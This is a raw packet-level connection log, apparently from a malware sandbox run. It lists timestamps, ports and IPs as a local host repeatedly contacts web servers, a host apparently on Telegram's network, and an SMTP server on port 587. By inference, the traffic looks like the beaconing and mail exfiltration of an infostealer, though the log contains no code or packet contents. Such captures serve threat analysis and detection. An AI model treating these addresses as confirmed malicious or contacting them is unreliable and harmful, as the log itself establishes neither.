Jan 14, 2025 08:08:33.321527958 CET	52742	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:33.322027922 CET	52752	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:33.322077990 CET	443	52752	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:33.322149992 CET	52752	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:33.322479010 CET	52752	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:33.322493076 CET	443	52752	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:33.361757994 CET	52751	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:33.557794094 CET	52753	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:33.562695980 CET	80	52753	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:33.562778950 CET	52753	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:33.563077927 CET	52753	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:33.567944050 CET	80	52753	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:33.800484896 CET	443	52752	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:33.802345991 CET	52752	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:33.802370071 CET	443	52752	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:33.939326048 CET	443	52752	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:33.939383984 CET	443	52752	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:33.939630985 CET	52752	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:33.939898014 CET	52752	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:33.951427937 CET	52751	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:33.952059031 CET	52754	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:33.956496954 CET	80	52751	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:33.956944942 CET	80	52754	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:33.957035065 CET	52754	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:33.957109928 CET	52751	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:33.957174063 CET	52754	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:33.961956978 CET	80	52754	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:34.378317118 CET	80	52753	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:34.382025003 CET	52753	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:34.386930943 CET	80	52753	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:34.666214943 CET	80	52753	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:34.729830980 CET	52753	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:34.780626059 CET	80	52754	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:34.782191038 CET	52755	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:34.782285929 CET	443	52755	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:34.782396078 CET	52755	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:34.782902956 CET	52755	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:34.782943010 CET	443	52755	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:34.822833061 CET	52754	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:35.056874990 CET	52756	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:35.056972027 CET	443	52756	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:35.057099104 CET	52756	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:35.069678068 CET	52756	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:35.069761992 CET	443	52756	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:35.274787903 CET	443	52755	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:35.276427031 CET	52755	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:35.276515007 CET	443	52755	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:35.391587019 CET	443	52755	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:35.391671896 CET	443	52755	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:35.391796112 CET	52755	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:35.392467022 CET	52755	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:35.395297050 CET	52754	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:35.395972967 CET	52757	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:35.400407076 CET	80	52754	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:35.400823116 CET	80	52757	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:35.400965929 CET	52754	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:35.401004076 CET	52757	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:35.401293039 CET	52757	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:35.407064915 CET	80	52757	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:35.532980919 CET	443	52756	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:35.533212900 CET	52756	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:35.535597086 CET	52756	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:35.535653114 CET	443	52756	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:35.536066055 CET	443	52756	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:35.588584900 CET	52756	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:35.592226028 CET	52756	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:35.639343977 CET	443	52756	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:35.696574926 CET	443	52756	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:35.696629047 CET	443	52756	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:35.696837902 CET	52756	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:35.713738918 CET	52756	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:35.722327948 CET	52753	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:35.727355957 CET	80	52753	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:36.007688999 CET	80	52753	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:36.058487892 CET	52753	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:36.169102907 CET	52758	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:36.169198990 CET	443	52758	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:36.169315100 CET	52758	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:36.173156023 CET	52758	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:36.173197031 CET	443	52758	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:36.226084948 CET	80	52757	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:36.228634119 CET	52759	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:36.228666067 CET	443	52759	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:36.228734970 CET	52759	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:36.229008913 CET	52759	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:36.229022980 CET	443	52759	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:36.275952101 CET	52757	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:36.624798059 CET	443	52758	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:36.626939058 CET	52758	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:36.627022028 CET	443	52758	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:36.691473961 CET	443	52759	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:36.693064928 CET	52759	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:36.693083048 CET	443	52759	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:36.746805906 CET	443	52758	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:36.746898890 CET	443	52758	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:36.747077942 CET	52758	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:36.747500896 CET	52758	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:36.756715059 CET	52753	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:36.757699966 CET	52760	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:36.761720896 CET	80	52753	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:36.761816978 CET	52753	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:36.762501001 CET	80	52760	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:36.762631893 CET	52760	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:36.762757063 CET	52760	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:36.767556906 CET	80	52760	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:36.820409060 CET	443	52759	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:36.820461035 CET	443	52759	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:36.820617914 CET	52759	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:36.821119070 CET	52759	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:36.866688013 CET	52757	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:36.871787071 CET	80	52757	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:36.871846914 CET	52757	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:36.875938892 CET	52761	443	192.168.2.4	149.154.167.220
Jan 14, 2025 08:08:36.876018047 CET	443	52761	149.154.167.220	192.168.2.4
Jan 14, 2025 08:08:36.876100063 CET	52761	443	192.168.2.4	149.154.167.220
Jan 14, 2025 08:08:36.876625061 CET	52761	443	192.168.2.4	149.154.167.220
Jan 14, 2025 08:08:36.876657963 CET	443	52761	149.154.167.220	192.168.2.4
Jan 14, 2025 08:08:37.508898020 CET	443	52761	149.154.167.220	192.168.2.4
Jan 14, 2025 08:08:37.508977890 CET	52761	443	192.168.2.4	149.154.167.220
Jan 14, 2025 08:08:37.511013031 CET	52761	443	192.168.2.4	149.154.167.220
Jan 14, 2025 08:08:37.511027098 CET	443	52761	149.154.167.220	192.168.2.4
Jan 14, 2025 08:08:37.511523008 CET	443	52761	149.154.167.220	192.168.2.4
Jan 14, 2025 08:08:37.512837887 CET	52761	443	192.168.2.4	149.154.167.220
Jan 14, 2025 08:08:37.559328079 CET	443	52761	149.154.167.220	192.168.2.4
Jan 14, 2025 08:08:37.578485012 CET	80	52760	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:37.579756975 CET	52762	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:37.579848051 CET	443	52762	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:37.579942942 CET	52762	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:37.580168009 CET	52762	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:37.580204010 CET	443	52762	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:37.619699001 CET	52760	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:37.752429008 CET	443	52761	149.154.167.220	192.168.2.4
Jan 14, 2025 08:08:37.752787113 CET	443	52761	149.154.167.220	192.168.2.4
Jan 14, 2025 08:08:37.752866030 CET	52761	443	192.168.2.4	149.154.167.220
Jan 14, 2025 08:08:37.762572050 CET	52761	443	192.168.2.4	149.154.167.220
Jan 14, 2025 08:08:38.044575930 CET	443	52762	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:38.046364069 CET	52762	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:38.046443939 CET	443	52762	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:38.196343899 CET	443	52762	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:38.196408987 CET	443	52762	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:38.196537971 CET	52762	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:38.197124958 CET	52762	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:38.201421022 CET	52760	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:38.202899933 CET	52763	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:38.206372023 CET	80	52760	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:38.206443071 CET	52760	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:38.207765102 CET	80	52763	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:38.207853079 CET	52763	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:38.207943916 CET	52763	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:38.212727070 CET	80	52763	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:39.049273968 CET	80	52763	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:39.050677061 CET	52764	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:39.050729990 CET	443	52764	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:39.050801992 CET	52764	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:39.051100969 CET	52764	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:39.051141977 CET	443	52764	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:39.103478909 CET	52763	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:39.543098927 CET	443	52764	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:39.545433044 CET	52764	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:39.545521021 CET	443	52764	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:39.811290979 CET	443	52764	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:39.811388969 CET	443	52764	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:39.811671972 CET	52764	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:39.812182903 CET	52764	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:39.850110054 CET	52765	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:39.855029106 CET	80	52765	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:39.857719898 CET	52765	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:39.857902050 CET	52765	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:39.862714052 CET	80	52765	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:40.663194895 CET	80	52765	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:40.711399078 CET	52765	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:40.720680952 CET	52763	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:40.724807978 CET	52766	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:40.724898100 CET	443	52766	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:40.724978924 CET	52766	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:40.899805069 CET	52766	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:40.899909019 CET	443	52766	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:41.396060944 CET	443	52766	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:41.401386023 CET	52766	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:41.401464939 CET	443	52766	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:41.587892056 CET	443	52766	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:41.588006973 CET	443	52766	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:41.588160992 CET	52766	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:41.588938951 CET	52766	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:41.658973932 CET	52765	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:41.664175034 CET	80	52765	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:41.664181948 CET	52767	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:41.664297104 CET	52765	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:41.669101954 CET	80	52767	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:41.669231892 CET	52767	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:41.669322968 CET	52767	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:41.674118042 CET	80	52767	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:42.559937954 CET	52768	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:42.565304041 CET	80	52768	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:42.565419912 CET	52768	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:42.565793991 CET	52768	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:42.570559978 CET	80	52768	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:42.570863008 CET	80	52767	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:42.594492912 CET	52769	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:42.594584942 CET	443	52769	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:42.594664097 CET	52769	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:42.595287085 CET	52769	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:42.595347881 CET	443	52769	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:42.646307945 CET	52767	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:43.067559958 CET	443	52769	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:43.069169998 CET	52769	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:43.069257021 CET	443	52769	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:43.220443010 CET	443	52769	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:43.220629930 CET	443	52769	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:43.220804930 CET	52769	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:43.236083984 CET	52769	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:43.370146036 CET	52767	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:43.370749950 CET	52770	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:43.375511885 CET	80	52767	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:43.375613928 CET	80	52770	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:43.375704050 CET	52770	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:43.375766993 CET	52767	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:43.375812054 CET	52770	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:43.380552053 CET	80	52770	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:43.489461899 CET	80	52768	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:43.494108915 CET	52768	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:43.499339104 CET	80	52768	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:43.837888956 CET	80	52768	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:43.943209887 CET	52768	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:44.352437973 CET	52771	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:44.352544069 CET	443	52771	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:44.352646112 CET	52771	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:44.360202074 CET	80	52770	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:44.362351894 CET	52772	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:44.362396002 CET	443	52772	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:44.362462044 CET	52772	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:44.362807989 CET	52772	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:44.362823963 CET	443	52772	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:44.372764111 CET	52771	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:44.372843027 CET	443	52771	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:44.411923885 CET	52770	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:44.911746979 CET	443	52772	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:44.913292885 CET	52772	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:44.913343906 CET	443	52772	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:44.923437119 CET	443	52771	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:44.923630953 CET	52771	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:44.925183058 CET	52771	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:44.925237894 CET	443	52771	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:44.925837040 CET	443	52771	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:44.974553108 CET	52771	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:44.989553928 CET	52771	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:45.031330109 CET	443	52771	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:45.057372093 CET	443	52772	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:45.057427883 CET	443	52772	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:45.057615042 CET	52772	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:45.057883978 CET	52772	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:45.060715914 CET	52770	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:45.061795950 CET	52773	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:45.065958977 CET	80	52770	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:45.066023111 CET	52770	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:45.066962004 CET	80	52773	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:45.067066908 CET	52773	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:45.067121983 CET	52773	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:45.072295904 CET	80	52773	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:45.100018978 CET	443	52771	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:45.100215912 CET	443	52771	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:45.100435972 CET	52771	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:45.104321957 CET	52771	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:45.115837097 CET	52774	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:08:45.116780043 CET	52768	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:45.120667934 CET	587	52774	46.151.208.21	192.168.2.4
Jan 14, 2025 08:08:45.120726109 CET	52774	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:08:45.121655941 CET	80	52768	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:45.444053888 CET	80	52768	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:45.446537018 CET	52775	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:45.446592093 CET	443	52775	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:45.447182894 CET	52775	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:45.447182894 CET	52775	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:45.447235107 CET	443	52775	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:45.484580994 CET	52768	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:45.897196054 CET	80	52773	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:45.898459911 CET	52776	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:45.898518085 CET	443	52776	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:45.898644924 CET	52776	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:45.899000883 CET	52776	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:45.899039030 CET	443	52776	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:45.935838938 CET	443	52775	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:45.937330961 CET	52775	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:45.937350035 CET	443	52775	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:45.943197966 CET	52773	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:46.083960056 CET	443	52775	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:46.084132910 CET	443	52775	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:46.084301949 CET	52775	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:46.084574938 CET	52775	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:46.088144064 CET	52768	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:46.089446068 CET	52777	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:46.093204021 CET	80	52768	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:46.093260050 CET	52768	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:46.094336987 CET	80	52777	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:46.094516993 CET	52777	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:46.094517946 CET	52777	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:46.099656105 CET	80	52777	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:46.352144957 CET	443	52776	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:46.358445883 CET	52776	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:46.358496904 CET	443	52776	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:46.481867075 CET	443	52776	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:46.481914043 CET	443	52776	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:46.482167959 CET	52776	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:46.482263088 CET	52776	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:46.484896898 CET	52773	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:46.485948086 CET	52778	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:46.489936113 CET	80	52773	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:46.490005970 CET	52773	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:46.490833044 CET	80	52778	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:46.491348982 CET	52778	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:46.491415977 CET	52778	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:46.496228933 CET	80	52778	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:46.929449081 CET	587	52774	46.151.208.21	192.168.2.4
Jan 14, 2025 08:08:46.929691076 CET	52774	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:08:46.930382967 CET	80	52777	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:46.934591055 CET	587	52774	46.151.208.21	192.168.2.4
Jan 14, 2025 08:08:46.935278893 CET	52779	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:46.935370922 CET	443	52779	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:46.935492992 CET	52779	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:46.935956955 CET	52779	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:46.936014891 CET	443	52779	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:46.974551916 CET	52777	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:47.224791050 CET	587	52774	46.151.208.21	192.168.2.4
Jan 14, 2025 08:08:47.227596998 CET	52774	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:08:47.232573986 CET	587	52774	46.151.208.21	192.168.2.4
Jan 14, 2025 08:08:47.297735929 CET	80	52778	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:47.300685883 CET	52780	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:47.300776005 CET	443	52780	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:47.300882101 CET	52780	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:47.301225901 CET	52780	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:47.301296949 CET	443	52780	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:47.349437952 CET	52778	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:47.404243946 CET	443	52779	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:47.408910036 CET	52779	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:47.408950090 CET	443	52779	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:47.504028082 CET	587	52774	46.151.208.21	192.168.2.4
Jan 14, 2025 08:08:47.507605076 CET	52774	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:08:47.512615919 CET	587	52774	46.151.208.21	192.168.2.4
Jan 14, 2025 08:08:47.545432091 CET	443	52779	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:47.545578003 CET	443	52779	104.21.16.1	192.168.2.4
